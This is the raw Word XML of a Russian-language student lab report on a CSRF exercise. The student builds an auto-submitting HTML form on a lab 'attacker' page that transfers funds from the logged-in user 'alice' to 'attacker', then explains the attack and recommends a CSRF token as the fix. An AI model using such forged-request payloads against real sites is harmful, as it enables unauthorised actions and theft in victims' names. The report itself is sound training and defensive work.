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13C" w:rsidRDefault="005B4CA2" w:rsidP="00D4642F">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005B4CA2">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6443765" cy="2655417"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="Рисунок 5" descr="E:\workspace\AppSec\AppSec\10\pic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10\pic-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549" cy="265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85C">
        <w:t xml:space="preserve">Первым шагом зашли на сайт </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00A6385C" w:rsidRPr="00D11081">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36102/dashboard</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A6385C">
        <w:t xml:space="preserve"> под именем </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A6385C" w:rsidRPr="00A6385C">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A6385C">
        <w:t xml:space="preserve">. Создалась </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A6385C">
        <w:t>кука</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A6385C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A6385C" w:rsidRPr="00A6385C">
        <w:t>alice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A6385C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008318BB">
        <w:t xml:space="preserve">Перешел на </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00CD06C6" w:rsidRPr="00D11081">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://62.173.140.174:36102/attacker</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00CD06C6">
        <w:t xml:space="preserve"> по кнопке «Перейти на сайт эксплойтов»</w:t>
      </w:r>
      <w:r w:rsidR="00D4642F">
        <w:t>. Создал</w:t>
      </w:r>
      <w:r w:rsidR="00D4642F" w:rsidRPr="00D4642F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4642F" w:rsidRPr="00D56531" w:rsidRDefault="00D4642F" w:rsidP="00D4642F">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML </w:t>
      </w:r>
      <w:r>
        <w:t>нагрузку</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4642F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4642F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br/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action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"http://62.173.140.174:36102/transfer"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method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"POST"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&lt;select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"to"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name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"to"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&lt;option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value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"attacker"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attacker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&lt;/option&gt;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&lt;/select&gt;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"amount"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name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"amount"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step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"0.01"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value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"11"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"submit"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Отправить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Start"/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script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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D4642F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42F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forms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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D4642F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D4642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submit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:rsidR="00D4642F" w:rsidRPr="00D4642F" w:rsidRDefault="00D4642F" w:rsidP="00D464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D4642F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script</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4642F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3C6293" w:rsidRDefault="00D56531" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
      </w:pPr>
      <w:r>
        <w:t>Нажал отправить, получил «Лабораторная работа решена успешно».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D56531" w:rsidRDefault="00A27CFF" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27CFF">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6539788" cy="2850102"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="6" name="Рисунок 6" descr="E:\workspace\AppSec\AppSec\10\pic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10\pic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477" cy="28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CFF" w:rsidRPr="00A27CFF" w:rsidRDefault="00A27CFF" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D56531" w:rsidRDefault="00351C27" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
      </w:pPr>
      <w:r w:rsidRPr="00351C27">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6439285" cy="2311603"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="Рисунок 7" descr="E:\workspace\AppSec\AppSec\10\pic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10\pic-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718" cy="231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4A3" w:rsidRDefault="00A26C5D" w:rsidP="006F24A3">
      <w:pPr>
        <w:ind w:left="-567"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A26C5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">так как пользователь уже зарегистрирован и его </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>куки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> хранятся в браузере и выполняются вредоносные действия от имени пользователя. В данном случае может привести к переводу всех денежных средств. А в целом любые доступные действия пользователю можно сделать от его </w:t>
      </w:r>
      <w:r w:rsidR="00760D64">
        <w:t>имени,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> но без его ведома. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F24A3" w:rsidRDefault="00AA759B" w:rsidP="006F24A3">
      <w:pPr>
        <w:ind w:left="-567"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Для исправления рекомендуется внедрить </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA759B">
        <w:t>CSRF-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AA759B">
        <w:t>токен</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> уникальный для каждого пользователя в форму, который знает толь</w:t>
      </w:r>
      <w:r w:rsidR="00A837C9">
        <w:t xml:space="preserve">ко сервер и страница браузера, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00A837C9">
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidR="00A96DB5">
        <w:t>апример</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A96DB5" w:rsidRPr="006F24A3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098548E" w:rsidRPr="006F24A3" w:rsidRDefault="0098548E" w:rsidP="006F24A3">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="006F24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form</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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action</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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24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http</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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://62.173.140.174:36102/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transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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F24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method</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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24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POST</w:t>
      </w:r>
      <w:r w:rsidRPr="006F24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F24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98548E" w:rsidRPr="006F24A3" w:rsidRDefault="0098548E" w:rsidP="0098548E">
      <w:pPr>
        <w:ind w:left="-567" w:firstLine="567"/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6F24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ab/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input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amount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name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amount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number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step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"0.01"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value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"11"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8548E" w:rsidRPr="0098548E" w:rsidRDefault="0098548E" w:rsidP="0098548E">
      <w:pPr>
        <w:ind w:left="-567" w:firstLine="1275"/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</w:pPr>
      <w:r w:rsidRPr="0098548E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8548E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8548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8548E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name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8548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98548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csrf_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0098548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8548E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value</w:t>
      </w:r>
      <w:r w:rsidRPr="0098548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98548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"ABC123"</w:t>
      </w:r>
      <w:r w:rsidRPr="0098548E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98548E" w:rsidRDefault="0098548E" w:rsidP="009854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ab/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642F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4642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"submit"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4642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Отправить</w:t>
      </w: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:rsidR="0098548E" w:rsidRPr="00D4642F" w:rsidRDefault="0098548E" w:rsidP="009854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4642F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:rsidR="00A01580" w:rsidRDefault="00A01580" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BB3514" w:rsidRPr="0098548E" w:rsidRDefault="00BB3514" w:rsidP="005B4CA2">
      <w:pPr>
        <w:ind w:left="-567"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00BB3514" w:rsidRPr="00985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5E"/>
    <w:rsid w:val="0002096F"/>
    <w:rsid w:val="00065866"/>
    <w:rsid w:val="000B0ACD"/>
    <w:rsid w:val="000F6E74"/>
    <w:rsid w:val="00172686"/>
    <w:rsid w:val="002727EE"/>
    <w:rsid w:val="00275D81"/>
    <w:rsid w:val="002B1FE7"/>
    <w:rsid w:val="002C6416"/>
    <w:rsid w:val="00317797"/>
    <w:rsid w:val="00345B5E"/>
    <w:rsid w:val="00351C27"/>
    <w:rsid w:val="003C6293"/>
    <w:rsid w:val="003E59C5"/>
    <w:rsid w:val="003E7A6A"/>
    <w:rsid w:val="00410F0E"/>
    <w:rsid w:val="0047103C"/>
    <w:rsid w:val="004903A8"/>
    <w:rsid w:val="0055733E"/>
    <w:rsid w:val="005B4CA2"/>
    <w:rsid w:val="006F24A3"/>
    <w:rsid w:val="00760D64"/>
    <w:rsid w:val="007D213C"/>
    <w:rsid w:val="007F4E38"/>
    <w:rsid w:val="008318BB"/>
    <w:rsid w:val="00875FC1"/>
    <w:rsid w:val="00940447"/>
    <w:rsid w:val="0098548E"/>
    <w:rsid w:val="00996978"/>
    <w:rsid w:val="00A01580"/>
    <w:rsid w:val="00A26C5D"/>
    <w:rsid w:val="00A27CFF"/>
    <w:rsid w:val="00A6385C"/>
    <w:rsid w:val="00A837C9"/>
    <w:rsid w:val="00A90EE0"/>
    <w:rsid w:val="00A96DB5"/>
    <w:rsid w:val="00AA2590"/>
    <w:rsid w:val="00AA759B"/>
    <w:rsid w:val="00AB19F3"/>
    <w:rsid w:val="00B02644"/>
    <w:rsid w:val="00B7171D"/>
    <w:rsid w:val="00BB3514"/>
    <w:rsid w:val="00BD15A5"/>
    <w:rsid w:val="00C3346B"/>
    <w:rsid w:val="00C57C40"/>
    <w:rsid w:val="00C70B09"/>
    <w:rsid w:val="00CA0F54"/>
    <w:rsid w:val="00CD06C6"/>
    <w:rsid w:val="00CD487A"/>
    <w:rsid w:val="00D23199"/>
    <w:rsid w:val="00D4642F"/>
    <w:rsid w:val="00D46B21"/>
    <w:rsid w:val="00D56531"/>
    <w:rsid w:val="00DD282E"/>
    <w:rsid w:val="00DE3C99"/>
    <w:rsid w:val="00E576AA"/>
    <w:rsid w:val="00EB30B3"/>
    <w:rsid w:val="00F0078C"/>
    <w:rsid w:val="00F011AF"/>
    <w:rsid w:val="00F36FE1"/>
    <w:rsid w:val="00FB6A7C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CBD77"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BFD02955-5826-4718-BA93-9C2E2F9F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77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62.173.140.174:36102/attacker" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://62.173.140.174:36102/dashboar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69</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-30T09:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-03T11:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>